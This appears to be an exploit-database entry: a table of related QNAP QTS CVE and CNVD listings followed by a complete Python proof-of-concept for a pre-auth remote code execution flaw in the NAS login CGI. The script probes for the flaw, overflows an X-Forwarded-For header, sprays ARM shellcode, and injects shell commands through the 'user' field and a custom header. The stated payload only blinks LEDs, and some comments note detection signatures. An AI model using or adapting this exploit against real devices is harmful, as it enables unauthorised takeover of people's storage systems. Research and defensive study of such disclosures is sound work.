| Reporter | Title | Published | Views | Family All 62 |
|---|---|---|---|---|
| CVE-2017-17027 | 24 May 2018 15:44 | – | circl | |
| CVE-2017-17032 | 24 May 2018 15:44 | – | circl | |
| QNAP QTS Buffer Overflow Vulnerability | 18 Dec 2017 00:00 | – | cnvd | |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37605) | 18 Dec 2017 00:00 | – | cnvd | |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37606) | 18 Dec 2017 00:00 | – | cnvd | |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37607) | 18 Dec 2017 00:00 | – | cnvd | |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37608) | 20 Dec 2017 00:00 | – | cnvd | |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37609) | 18 Dec 2017 00:00 | – | cnvd | |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37610) | 20 Dec 2017 00:00 | – | cnvd | |
| CVE-2017-17027 | 21 Dec 2017 15:00 | – | cve | |
# !/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# Pre-auth Remote Code Execution exploit for QNAP QTS
# 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116
#
# Just a quick dirty RCE PoC to make your QNAP sing "XMAS" in morse.
#
# Author: Andrea Palazzo (@cogitoergor00t)
# E-mail: not-interested-in-chinese-spammers@seriously-dont-crawler-this.lol
# Web: https://truel.it
# Lab: https://lab.truel.it
#
# While collecting material for writing up CVE-2017-17033 I noticed this was fixed too, so it's probably one of CVE-2017-17027 | CVE-2017-17028 | CVE-2017-17029 | CVE-2017-17030 | CVE-2017-17031 | CVE-2017-17032.
# More info: https://www.qnap.com/en/security-advisory/nas-201712-15
#
# This version has been developed against model TS-212P running QTS 4.3.3.0299, but could easily be adjusted for <= 4.3.3.0378 (you'll find a little present in the comments)
#
# --------------
import sys, argparse
from non.ha import anza
try:
    import requests
    # request() below passes verify=False, so TLS certificate validation is
    # already off; this line only silences urllib3's InsecureRequestWarning
    # that would otherwise be printed for every such request.
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
except ImportError:
    # `requests` is the only third-party dependency; stop here without it.
    print "Do you even web bro?"
    sys.exit(0)
# Static request pieces shared by the functions below.  The author's inline
# notes record values observed on other firmware builds and are kept as-is.
exploit_data = {
    # CGI endpoint that receives every POST made by request().
    "target_endpoint": "/cgi-bin/filemanager/wfm2Login.cgi",
    # Command string sent in the W00T request header; the body injected in
    # exploit() evals $HTTP_W00T.  Presumably the LED "XMAS" morse sequence
    # mentioned in the file header.
    "payload": "pic_raw 81;pic_raw 80;pic_raw 80;pic_raw 81;sleep 1;pic_raw 81;pic_raw 81;sleep 1;pic_raw 80;pic_raw 81;sleep 1;pic_raw 80;pic_raw 80;pic_raw 80;#",
    # Value placed in the X-Forwarded-For header by exploit(): 92 padding
    # bytes followed by the author's SP/PC words.  Detection note: a header
    # of this length on the endpoint above is abnormal for legitimate clients.
    "bof": "A"*92+"\xff\x60\x66\xff"+"\x90\x60\xff", #PADDING+SP+PC
    # ARM stub that spray() repeats throughout the POST body.
    "shellcode": "\x2d\xd4\xa0\xe1" + #mov sp, sp, lsr #8
    #old popen @ 22c9c
    #07/07 @22e24
    #28/07 @230dc
    #05/09 @21e90
    "\x86\x3b\xa0\xe3" + #mov r3, 0x21800
    "\x69\x3e\x83\xe2" + #add r3, 0x690
    "\x13\xff\x2f\xe1" #bx r3
}
def request(target, data, headers):
    """POST *data* with *headers* to the login CGI on *target*.

    Returns the ``requests.Response``.  Certificate validation is disabled
    (``verify=False``), so self-signed appliance certificates are accepted.
    """
    endpoint = exploit_data['target_endpoint']
    return requests.post(
        target + endpoint,
        headers=headers,
        data=data,
        verify=False,
    )
def vulnerable(target):
    """Return True if *target* responds like a vulnerable build.

    A single POST with a 200-byte X-Forwarded-For header is sent to the login
    CGI via request(); an HTTP 500 status is taken as the crash signature and
    nothing in the response body is inspected.  Any transport error prints a
    message and terminates the process with sys.exit().

    Defender note: an oversized X-Forwarded-For header on
    /cgi-bin/filemanager/wfm2Login.cgi followed by a 500 response is the
    wire-level observable of this probe.
    """
    print ">> Checking if likely to be vulnerable"
    headers = {
        'User-Agent': 'Vuln tester',
        'X-Forwarded-For': "A" * 200
    }
    try:
        r = request(target, "user=admin", headers)
    except:
        # Bare except: also catches KeyboardInterrupt/SystemExit before exiting.
        print "Something wrong: {}".format(sys.exc_info()[0])
        sys.exit()
    # The status code is the only signal used.
    return (r.status_code == 500)
def spray(n):
    """Build the POST body used by exploit(): *n* identical key=value pairs.

    Key and value are both the shellcode repeated three times plus a fixed
    4-byte tail; pairs are '&'-separated with no trailing '&'.  ``n == 0``
    yields the empty string.
    """
    fragment = exploit_data["shellcode"] * 3 + "\x08\x80\xa0\xe1"
    body = ''.join('{}={}&'.format(fragment, fragment) for _ in range(n))
    # Drop the separator left after the last pair.
    return body[:-1]
def exploit(target):
    """Run the exploit against *target* until the success marker appears.

    Refuses to start if /cgi-bin/pwn already answers 200 (a previous run left
    its marker).  Otherwise it POSTs the spray() body plus an injected
    ``user=`` value to the login CGI in an unbounded loop, re-checking
    /cgi-bin/pwn after each attempt, and breaks once it returns 200.  Any
    transport error prints a message and ends the process with sys.exit().

    Defender note: the success marker is a file created at
    /home/httpd/cgi-bin/pwn; its presence on a NAS (or a 200 for
    /cgi-bin/pwn) is a post-exploitation indicator, and repeated POSTs with a
    31337-pair body to wfm2Login.cgi are the on-wire signature.
    """
    print "Let's " + exploit_data['payload'] + "\n! COULD TAKE A WHILE !"
    # Marker already present: do not stack another run on top of it.
    if requests.get(target + "/cgi-bin/pwn").status_code == 200:
        print "... but first you need to clean up your mess, don't you?"
        sys.exit()
    headers = {
        'W00T': exploit_data['payload'],
        'X-Forwarded-For': exploit_data["bof"] #There were others, I'm sure you can figure'em out yourself if you need
    }
    # Body: the spray pairs, then the injected user value that creates the
    # marker file and evals the W00T header.
    data = spray(31337) + "&user=touch /home/httpd/cgi-bin/pwn; eval $HTTP_W00T;"
    # Only a 200 on the marker (break) or an exception (sys.exit) ends this loop.
    while True:
        #print '.'
        try:
            request(target, data, headers)
            if requests.get(target + "/cgi-bin/pwn").status_code == 200:
                print ">> w00t :)"
                break
        except:
            # Bare except: any failure, including KeyboardInterrupt, ends the run here.
            print "Something wrong: {}".format(sys.exc_info()[0])
            sys.exit()
if __name__ == "__main__":
    print ""
    parser = argparse.ArgumentParser(description = 'Pre-auth Remote Code Execution exploit for QNAP QTS <= 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116')
    # The dest string doubles as the label shown in usage output; the value
    # is read back through vars(args) below.
    parser.add_argument('-t', '--target', dest = 'http(s)://uri[:port]', required = True)
    parser.add_argument('-c', '--check', help = 'No exploitation will be performed.', action = 'store_true')
    args = parser.parse_args()
    target = vars(args)['http(s)://uri[:port]']
    print "\n------------------------------------------\n" + \
        "Pre-auth Remote Code Execution exploit for \n" + \
        "QNAP QTS <=\t4.2.6 build 20171026\n\t\t4.3.3.0378 build 20171117\n\t\t4.3.4.0387 build 20171116\n\t\t(Beta 2)" + \
        "\n------------------------------------------\n" + \
        "@cogitoergor00t\t\t https://truel.it" + \
        "\n------------------------------------------\n" \
    print ">> Targeting " + target
    # Probe first; exit when the target does not show the crash signature.
    if not vulnerable(target):
        print ">< Nothing to do here :("
        sys.exit(0)
    print ">> Probably vulnerable"
    # --check stops after the probe; otherwise run the exploit.
    if (args.check):
        print ">> See you"
    else:
        print ">> Gonna make this baby sing\n"
        exploit(target)